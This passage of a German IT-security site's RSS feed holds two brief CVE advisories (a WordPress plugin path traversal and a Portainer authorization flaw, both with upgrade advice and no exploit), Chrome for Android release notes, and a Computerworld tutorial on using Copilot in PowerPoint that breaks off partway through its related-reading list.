<description><![CDATA[A vulnerability, which was classified as critical, was found in Ultimate Member Plugin up to 2.5.0 on WordPress. Affected by this issue is the function load_template of the file includes/core/class-shortcodes.php of the component Template Handler. Executing a manipulation of the argument tpl can ...]]></description>
<link>https://tsecurity.de/de/3688709/sicherheitsluecken/cve-2022-3966-ultimate-member-plugin-up-to-250-on-wordpress-template-class-shortcodesphp-loadtemplate-tpl-pathname-traversal-euvd-2022-43298/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688709/sicherheitsluecken/cve-2022-3966-ultimate-member-plugin-up-to-250-on-wordpress-template-class-shortcodesphp-loadtemplate-tpl-pathname-traversal-euvd-2022-43298/</guid>
<pubDate>Thu, 23 Jul 2026 12:28:59 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/ultimate_member_plugin">Ultimate Member Plugin up to 2.5.0</a> on WordPress. Affected by this issue is the function <code>load_template</code> of the file <em>includes/core/class-shortcodes.php</em> of the component <em>Template Handler</em>. Executing a manipulation of the argument <em>tpl</em> can lead to pathname traversal.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2022-3966">CVE-2022-3966</a>. The attack may be launched remotely. There is no exploit available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome for Android Update]]></title>
<description><![CDATA[ Hello Everyone! We've just released Chrome 151 (151.0.7922.47) for Android to a small percentage of users. It'll become available on Google Play over the next few days. You can find more details about early Stable releases here.This release includes stability and performance improvements. You ca...]]></description>
<link>https://tsecurity.de/de/3687836/it-security-nachrichten/chrome-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687836/it-security-nachrichten/chrome-for-android-update/</guid>
<pubDate>Thu, 23 Jul 2026 03:11:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p> Hello Everyone! We've just released Chrome 151 (151.0.7922.47) for Android to a small percentage of users. It'll become <a href="https://play.google.com/store/apps/details?id=com.android.chrome">available on Google Play</a> over the next few days. You can find more details about early Stable releases <a href="https://developer.chrome.com/blog/early-stable/">here</a>.</p>This release includes stability and performance improvements. You can see a full list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.181..151.0.7922.47?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.<br><br>Harry Souders<br><a href="https://www.google.com/chrome/">Google Chrome</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Beta for Android Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Beta 151 (151.0.7922.47) for Android. It's now available on Google Play.You can see a partial list of the changes in the Git log. For details on new features, check out the Chromium blog, and for details on web platform updates, check here.If you find a new...]]></description>
<link>https://tsecurity.de/de/3686946/it-security-nachrichten/chrome-beta-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686946/it-security-nachrichten/chrome-beta-for-android-update/</guid>
<pubDate>Wed, 22 Jul 2026 17:55:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Beta 151 (151.0.7922.47) for Android. It's now available on <a href="https://play.google.com/store/apps/details?id=com.chrome.beta">Google Play</a>.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/151.0.7922.29..151.0.7922.47?pretty=fuller&amp;n=10000">Git log</a>. For details on new features, check out the <a href="https://blog.chromium.org/">Chromium blog</a>, and for details on web platform updates, check <a href="https://www.chromestatus.com/features#milestone%3D151">here</a>.</p><p>If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Cyber Odyssey: What Ancient Myths Teach Us About Modern Human Risk]]></title>
<description><![CDATA[Every organization is on a cyber odyssey. The threats may look mythical, but the risks are deeply human.]]></description>
<link>https://tsecurity.de/de/3686753/it-security-nachrichten/the-cyber-odyssey-what-ancient-myths-teach-us-about-modern-human-risk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686753/it-security-nachrichten/the-cyber-odyssey-what-ancient-myths-teach-us-about-modern-human-risk/</guid>
<pubDate>Wed, 22 Jul 2026 17:05:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="hs-featured-image-wrapper"> 
 <a href="https://cybermaniacs.com/cm-blog/the-cyber-odyssey-what-ancient-myths-teach-us-about-modern-human-risk" title="" class="hs-featured-image-link"> <img src="https://cybermaniacs.com/hubfs/Template.png" alt="The Cyber Odyssey: What Ancient Myths Teach Us About Modern Human Risk" class="hs-featured-image"> </a> 
</div> 
<p><span><strong>Every organization is on a cyber odyssey. The threats may look mythical, but the risks are deeply human.</strong></span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-44884 | portainer Community Edition up to 2.33.7/2.39.0 Custom Template File Endpoint file authorization (GHSA-cqpq-2fgr-8mvc)]]></title>
<description><![CDATA[A vulnerability classified as problematic was found in portainer Community Edition up to 2.33.7/2.39.0. This affects an unknown function of the file /api/custom_templates/{id}/file of the component Custom Template File Endpoint. The manipulation results in missing authorization.

This vulnerabili...]]></description>
<link>https://tsecurity.de/de/3686275/sicherheitsluecken/cve-2026-44884-portainer-community-edition-up-to-23372390-custom-template-file-endpoint-file-authorization-ghsa-cqpq-2fgr-8mvc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686275/sicherheitsluecken/cve-2026-44884-portainer-community-edition-up-to-23372390-custom-template-file-endpoint-file-authorization-ghsa-cqpq-2fgr-8mvc/</guid>
<pubDate>Wed, 22 Jul 2026 14:25:30 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> was found in <a href="https://vuldb.com/product/portainer:community_edition">portainer Community Edition up to 2.33.7/2.39.0</a>. This affects an unknown function of the file <em>/api/custom_templates/{id}/file</em> of the component <em>Custom Template File Endpoint</em>. The manipulation results in missing authorization.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-44884">CVE-2026-44884</a>. The attack can be launched remotely. No exploit exists.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[10 cool things Copilot can do in PowerPoint]]></title>
<description><![CDATA[Building a presentation can take lots of time. There are design choices to figure out: the slide layouts, fonts, theme colors, and so on. You can use a template to skip this hassle, but you still have to paste your text and other content into the slides and edit it all so that the results are vis...]]></description>
<link>https://tsecurity.de/de/3686068/it-nachrichten/10-cool-things-copilot-can-do-in-powerpoint/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686068/it-nachrichten/10-cool-things-copilot-can-do-in-powerpoint/</guid>
<pubDate>Wed, 22 Jul 2026 13:05:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Building a presentation can take lots of time. There are design choices to figure out: the slide layouts, fonts, theme colors, and so on. You can use a template to skip this hassle, but you still have to paste your text and other content into the slides and edit it all so that the results are visually appealing.</p>



<p class="wp-block-paragraph">In PowerPoint, Microsoft’s Copilot AI assistant can now automate the heavy lifting of presentation creation. It can generate a first-draft presentation in minutes, then help you edit it. You can also prompt Copilot to help you quickly understand the contents of a presentation and glean insights from it. Use the tips in this guide to save oodles of time as you create and work with presentations.</p>



<h3 class="wp-block-heading">Who can use Copilot in PowerPoint</h3>



<p class="wp-block-paragraph">Individuals with a <a href="https://www.microsoft.com/en-us/microsoft-365-copilot/pricing/individuals" target="_blank" rel="noreferrer noopener">Microsoft 365 Personal, Family, or Premium</a> subscription have access to Copilot from within PowerPoint and other Microsoft 365 apps. Users with a Premium plan have <a href="https://support.microsoft.com/en-US/Microsoft-365-Copilot/ai-credits-and-limits-for-microsoft-365-subscriptions" target="_blank" rel="noreferrer noopener">higher Copilot usage allowances</a> and access to advanced AI features.</p>



<p class="wp-block-paragraph">For business users, it’s more complicated. Organizations with more than 2,000 users must pay for <a href="https://www.computerworld.com/article/1629974/m365-copilot-microsofts-generative-ai-tool-explained.html">Microsoft 365 Copilot</a> licenses for their users in addition to their regular Microsoft 365 licenses. Users at organizations with fewer than 2,000 users can use Copilot within M365 apps even without the M365 Copilot add-on licenses, but there are <a href="https://support.microsoft.com/en-us/microsoft-365-copilot/how-copilot-chat-works-with-and-without-a-microsoft-365-copilot-license" target="_blank" rel="noreferrer noopener">limitations</a> in usage, speed, and feature availability.</p>



<p class="wp-block-paragraph">To see what kind of access you have, log in to Microsoft’s <a href="https://m365.cloud.microsoft/" target="_blank" rel="noreferrer noopener">Copilot Chat web hub</a> and look for your name in the lower left corner. If you see “M365 Copilot (Premium)” under your name, you can use Copilot in M365 apps with priority access and advanced features. “M365 Copilot (Basic)” means you can use Copilot in M365 apps with lower-priority access and limited features. If you see “Copilot Chat (Basic)” or nothing below your name, you can’t use Copilot in M365 apps.</p>



<p class="wp-block-paragraph"><em>(Copilot Chat Basic users do get some Copilot functionality, including the ability to generate presentations, via the Copilot Chat hub. See our <a href="https://www.computerworld.com/article/4171293/copilot-chat-your-hub-for-document-creation-and-analysis.html">Copilot Chat tutorial</a> for details.)</em></p>



<h4 class="wp-block-heading"><strong>In this article:</strong></h4>



<ul class="wp-block-list">
<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#sidebar">Working with Copilot in PowerPoint</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#template">Create a presentation template</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#pres-from-doc">Create a presentation from a document</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#slide-from-doc">Add content from a document to a slide</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#refine-text">Refine your slide text</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#image">Find or create an image</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#expand">Expand your presentation with relevant slides</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#summarize">Summarize a presentation</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#answer-questions">Answer questions about a presentation</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#navigate">Help you navigate a large presentation</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#speaker-notes">Generate speaker notes and/or an FAQ</a></li>
</ul>



<h2 class="wp-block-heading">Working with Copilot in PowerPoint</h2>



<p class="wp-block-paragraph">First, let’s quickly go over the notable settings of the Copilot sidebar.</p>



<p class="wp-block-paragraph">When you have a presentation open in PowerPoint, click the Copilot icon; it may be floating at the lower-right corner of your PowerPoint window or parked at the right end of the Ribbon toolbar. The Copilot sidebar will open along the right of the page. You’ll type your prompts to Copilot inside the chat window in this pane.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-01-sidebar.png?w=1024" alt="powerpoint screen with copilot sidebar open on right" class="wp-image-4195065" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>The sidebar on the right is where you interact with Copilot in PowerPOint.</p><br></figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph"><strong>Agent mode:</strong> By default, Copilot can build a new presentation or make changes to an existing one in the main PowerPoint window. This is known as “agent mode.” To change this so that Copilot can’t take direct action on a presentation (all its responses appear in the sidebar), click the <em>Allow editing</em> button above the chat window and change it to <em>Chat only</em>.</p>



<p class="wp-block-paragraph">The tips in this guide require that Copilot be in agent mode, so make sure you see <em>Allow editing</em> above the chat window.</p>



<p class="wp-block-paragraph"><strong>Choice of AI model:</strong> Behind the scenes, Copilot has access to various genAI models, including different versions of Anthropic Claude and OpenAI GPT.  By default, it decides which model to use based on your prompt. You can set it to use a particular model: click <em>Auto</em> at the upper right of the Copilot pane and select a model from the dropdown that opens.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-02-sidebar-model-dropdown.png?w=1024" alt="screenshot of copilot sidebar in powerpoint with models dropdown menu open" class="wp-image-4195063" width="1024" height="697" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>You can choose which AI model you want Copilot to use for a request.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">The tips in this guide should work fine on the default <em>Auto</em> setting. But feel free to experiment switching to specific models to see which give you the best results for particular tasks.</p>



<p class="wp-block-paragraph"><strong>Important:</strong> Remember that <a href="https://www.computerworld.com/article/4059383/openai-admits-ai-hallucinations-are-mathematically-inevitable-not-just-engineering-flaws.html">generative AI output often includes errors</a>, so always check Copilot’s output for accuracy. (Also see our <a href="https://www.computerworld.com/article/4067372/how-to-curb-hallucinations-in-copilot-and-other-genai-tools.html">tips for reducing hallucinations in Copilot</a>.) You’ll likely want to rewrite it in your own voice as you’re reviewing it.</p>



<h2 class="wp-block-heading"><a></a>1. Create a presentation template</h2>



<p class="wp-block-paragraph">For many people, the hardest part of creating a presentation is getting started. What types of information should be included on the slides, and in what order? Copilot can give you a leg up by creating the type of presentation you need, with placeholder data that you can later replace with your own.</p>



<p class="wp-block-paragraph">Start a new presentation, open the Copilot sidebar, and type your prompt into the chat window. It’s best to provide very specific details in your prompt. The more context or details you provide, the more likely Copilot will generate a presentation template that suits your needs.</p>



<p class="wp-block-paragraph">A good prompt should contain the slide count, subject, audience, and tone. Example:</p>



<ul class="wp-block-list">
<li><em>Create a 6-slide presentation for a sales meeting focusing on Q1 revenue. The audience is the sales team, so keep the tone professional and focused on the sales data.</em></li>
</ul>



<p class="wp-block-paragraph">Copilot may ask a series of follow-up questions, such as your preferred visual style and desired level of detail. Then it will generate a presentation template.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-03-generated-presentation-with-placeholder-data.png?w=1024" alt="screenshot of powerpoint presentation generated by copilot with placeholder data" class="wp-image-4195064" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot generates a presentation with placeholder data and explains its elements.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">You can optionally prompt Copilot for revisions, and when you’re happy with the template, swap in your own data.</p>



<h2 class="wp-block-heading"><a></a>2. Create a presentation from a document</h2>



<p class="wp-block-paragraph">You can attach a document (such as a Word document, Excel spreadsheet, or PDF) and prompt Copilot to generate a presentation based on its contents. This works best with a structured-format document (such as a business plan, project proposal, or summary report) that contains sections with headings.</p>



<p class="wp-block-paragraph">Copilot can extract the document’s text and structure to generate the slide content for the new presentation. This can especially be useful for quickly turning a long report into a visually appealing presentation.</p>



<p class="wp-block-paragraph">In the Copilot pane, click the <em>+</em> icon at the bottom of the chat window. A list of documents that you’ve recently accessed appears. Select the one that you want Copilot to use. Alternatively, click the magnifying glass icon and inside its search box, type a few letters of the filename for the document you want. (Business users with an M365 Copilot license can select up to five files for Copilot to pull from when creating a presentation.)</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-04-attach-document.png?w=1024" alt="screenshot of copilot sidebar in powerpoint with a document being attached for copilot to base a presentation on" class="wp-image-4195062" width="1024" height="733" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Attaching a document for Copilot to base a presentation on.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">Then in the chat window, you can enter a prompt that’s as simple as “<em>Create a presentation</em>,” although as always, providing more details and context is better. This is especially important for corporate users who reference multiple source files. It’s useful to tell Copilot what data to pull from each document.</p>



<p class="wp-block-paragraph">Answer any follow-up questions that Copilot asks, and it will then generate the presentation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-05-generated-presentation-from-doc.png?w=1024" alt="screenshot of powerpoint with a presentation generated by copilot from a document" class="wp-image-4195067" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot has generated a professional presentation from a social media marketing campaign document.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">Note: Your marketing department may have created one or more <a href="https://support.microsoft.com/en-US/PowerPoint/copilot/keep-your-presentation-on-brand-with-copilot" target="_blank" rel="noreferrer noopener">branded company templates for Copilot to work from</a>. If that’s the case at your organization, simply open the appropriate company template as your first step. Then you can upload docs and type a prompt as described above. Copilot will create a presentation using the branded template.</p>



<h2 class="wp-block-heading"><a></a>3. Add content from a document to a slide</h2>



<p class="wp-block-paragraph">Manually copying text or other content from a document and pasting it into a new slide is a chore. Instead, you can prompt Copilot to extract information directly from a Word document, Excel spreadsheet, or PDF to create new slides.</p>



<p class="wp-block-paragraph">In the Copilot pane, attach the document using the same steps described in tip 2, then tell Copilot to create a slide from the document. As always, it helps to provide details such as the new slide’s focus or what data to include:</p>



<ul class="wp-block-list">
<li><em>Add a slide based on the attached document.</em></li>



<li><em>Use the attached file to add a slide about the project budget that focuses on Q1 projections.</em></li>



<li><em>Summarize only the financial section of the attached document as a slide.</em></li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-06-generated-slide-from-spreadsheet.png?w=1024" alt="screenshot of a slide in powerpoint generated by copilot from spreadsheet data" class="wp-image-4195068" width="1024" height="612" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>A new Copilot-generated slide based on data from an Excel spreadsheet.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h2 class="wp-block-heading"><a></a><a></a>4. Refine your slide text</h2>



<p class="wp-block-paragraph">A presentation should be visual and display only the core message. Conciseness and proper writing tone are essential for your slides, so that they don’t lose the attention of your audience.</p>



<p class="wp-block-paragraph">You can prompt Copilot to refine text on an individual slide in various ways, such as rewriting it in a more professional tone or making it more concise. Highlight the text inside a text box on the slide. On the toolbar that appears over the highlighted text, click <em>Edit with Copilot</em>.</p>



<p class="wp-block-paragraph">On the menu that opens, you can select a preset prompt to refine the text, such as <em>Condense</em> or <em>Make professional</em>. Or, at the top of this menu, you can type a prompt to rewrite the highlighted text.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-07-refine-slide-text-options-menu.png" alt="screenshot of text on a powerpoint slide with copilot dropdown menu includng condense and make professional options" class="wp-image-4195066" width="960" height="690" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="wp-element-caption"><p>Choose a preset prompt for refining text on a slide or type in your own prompt.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">Note that this feature affects all the text inside the text box. To rewrite only a portion of text inside a text box, you must split that portion out into a separate text box.</p>



<p class="wp-block-paragraph">Alternatively, you can prompt Copilot to analyze your entire presentation and tighten up the wording throughout all of its slides. For example:</p>



<ul class="wp-block-list">
<li><em>Make these slides more visual and use less text.</em></li>
</ul>



<h2 class="wp-block-heading">5. Find or create an image</h2>



<p class="wp-block-paragraph">If you have Copilot generate a presentation from an existing Word document that contains images, it will incorporate those images into the presentation. If there are no images in the source document, you can ask Copilot to find or create one and add it to a slide.</p>



<p class="wp-block-paragraph">To add a stock image or an image from your organization’s brand library, tell Copilot what you’re looking for:</p>



<ul class="wp-block-list">
<li><em>Add a stock photo of young adults in a cafe drinking boba tea.</em></li>



<li><em>Add a photo from our asset library of young adults in a cafe drinking boba tea.</em></li>
</ul>



<p class="wp-block-paragraph">To have Copilot create an image using Microsoft’s Designer image generation tool, describe your desired image. As always, specificity is helpful:</p>



<ul class="wp-block-list">
<li><em>Create a photorealistic image of a diverse group of 5 or 6 fashionable young adults sitting in a cafe drinking boba tea. They’re smiling or laughing, and some are looking at their phones.</em></li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-08-generate-image.png?w=1024" alt="screenshot of image generation prompt in copilot sidebar in powerpoint plus the resulting generated image on a slide" class="wp-image-4195097" width="1024" height="594" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot in PowerPoint hooks into Microsoft’s Designer tool for image generation.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">Just as you need to review any text output from Copilot, take a close look at generated images to be sure nothing looks off. </p>



<p class="wp-block-paragraph">Also note that Copilot image generation isn’t always reliable in PowerPoint. For some time during our testing for this story, Copilot said it couldn’t create an image because “the image generation service is returning a server error on every attempt.” After about a day and a half, the service began working again.</p>



<h2 class="wp-block-heading"><a></a>6. Expand your presentation with relevant slides</h2>



<p class="wp-block-paragraph">As you’re building your presentation, you may find that it’s become text heavy. Or perhaps it could use more visually oriented slides to break things up and make its progression flow better. Copilot can generate and insert new slides that are based on the content of the slides already in the presentation.</p>



<p class="wp-block-paragraph">In the Copilot pane, specify exactly where you want the new slide to go. This helps Copilot to analyze the content of the slides before and after where you want the new slide. Then it can generate a slide to bridge between the two slides. Examples:</p>



<ul class="wp-block-list">
<li><em>Add a slide after slide 3 about our competitive advantages.</em></li>



<li><em>Add a slide after slide 11 that transitions to slide 12.</em></li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-09-generated-transition-slide.png?w=1024" alt="screenshot of powerpoint screen with copilot sidebar and a transition slide generated by copilot" class="wp-image-4195094" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Need a transition slide? Just ask!</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h2 class="wp-block-heading">7. Summarize a presentation</h2>



<p class="wp-block-paragraph">Maybe you need a quick refresh of your presentation before an important meeting. Or maybe a co-worker has sent you a presentation that’s packed with lots of slides. You can prompt Copilot to generate a summary of the presentation’s overall messaging.</p>



<p class="wp-block-paragraph">In the Copilot pane, just type “<em>summarize this presentation</em>.” You can also have Copilot flag key slides that contain important information: “<em>show me key slides</em>.”</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-10-summarize-key-slides.png?w=1024" alt="screenshots of copilot sidebar in powerpoint - one with summarize results and one with key slides response" class="wp-image-4195095" width="1024" height="774" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Ask Copilot to summarize a presentation or flag key slides.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h2 class="wp-block-heading"><a></a>8. Answer questions about a presentation</h2>



<p class="wp-block-paragraph">As you’re reviewing a presentation, especially one that you didn’t create and are not familiar with, you can get Copilot to pull key data points from its slides.</p>



<p class="wp-block-paragraph">In the Copilot pane, type specific informational questions. Examples:</p>



<ul class="wp-block-list">
<li><em>What are the action items in this deck?</em></li>



<li><em>What is the proposed budget mentioned here?</em></li>
</ul>



<p class="wp-block-paragraph">If Copilot can’t find the exact answer to the question you ask, it will provide related information from the presentation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-11-ask-questions-about-presentation.png?w=1024" alt="screenshot of copilot sidebar in powerpoint with response to query about proposed budget in the slide deck" class="wp-image-4195093" width="1024" height="760" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Ask Copilot specific questions about the contents of a presentation.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">This method can also help you validate that your presentation includes everything you want it to. If you ask Copilot about the action items in a presentation and it can’t find any, you know you need to add them. (Copilot will likely offer to generate them for you based on the rest of the slides.)</p>



<p class="wp-block-paragraph">You can even take this tactic a step further and ask Copilot if the presentation is missing any important data, if any slides are weak or confusing, if there are any awkward transitions, if there are key points that should be better emphasized, and so on.</p>



<h2 class="wp-block-heading"><a></a>9. Help you navigate a large presentation</h2>



<p class="wp-block-paragraph">In the business world, presentations with dozens of slides are not uncommon, such as for financial reports or project documentation. Trying to find a specific slide or multiple slides can be tough. Copilot can help you navigate such a presentation.</p>



<p class="wp-block-paragraph">In the Copilot pane, prompt Copilot to find slides based on specific topics. Example:</p>



<ul class="wp-block-list">
<li><em>Show me the slides about the project timeline.</em></li>
</ul>



<p class="wp-block-paragraph">Copilot will analyze the presentation and reply with a list of links to the relevant slides. Click one of these to jump directly to that slide.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-12-navigate-presentation.png?w=1024" alt="screenshot of copilot sidebar in powerpoint with response about the slide that talks about target audience" class="wp-image-4195096" width="1024" height="760" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot can help you zoom directly to a slide that covers a particular topic or shows specific data.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h2 class="wp-block-heading"><a></a>10. Generate speaker notes and/or an FAQ</h2>



<p class="wp-block-paragraph">Here’s a great timesaver when you’re preparing to show your presentation to an audience: Copilot can automatically generate suggested speaker notes for you, based on the content of your slides. Example prompt:</p>



<ul class="wp-block-list">
<li><em>Write speaker notes for every slide with one talking point per slide.</em></li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-13-speaker-notes.png?w=1024" alt="screenshot of powerpoint presentation with speaker notes generated by copilot" class="wp-image-4195092" width="1024" height="607" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot can create speaker notes in seconds.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">In a related feature, Copilot can create a frequently asked questions list (FAQ) for you to consult in your speaker notes or to present as a slide:</p>



<ul class="wp-block-list">
<li><em>Write an FAQ for these slides.</em></li>
</ul>



<p class="wp-block-paragraph">Copilot will ask where you want the questions and answers added — as a new slide at the end, integrated into the speaker notes of relevant slides, or somewhere else that you designate. Make a selection, and Copilot will generate the FAQ based on the content of your presentation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-14-generated-faq-slide.png?w=1024" alt="screenshot of frequently asked questions slide generated by copilot in powerpoint" class="wp-image-4195091" width="1024" height="609" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>A Copilot-generated FAQ slide.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h4 class="wp-block-heading"><strong>Related reading:</strong></h4>



<ul class="wp-block-list">
<li><a href="https://www.computerworld.com/article/4119411/11-cool-things-copilot-can-do-in-excel.html">11 cool things Copilot can do in Excel</a></li>



<li><a href="https://www.computerworld.com/article/4022584/9-ways-copilot-can-turbocharge-onenote.html">9 ways Copilot can turbocharge OneNote</a></li>



<li><a href="https://www.computerworld.com/article/1647230/powerpoint-for-microsoft-365-cheat-sheet.html">PowerPoint for Microsoft 365 cheat sheet</a></li>



<li><a href="https://www.computerworld.com/article/4171293/copilot-chat-your-hub-for-document-creation-and-analysis.html">Copilot Chat: Your hub for document creation and analysis</a></li>



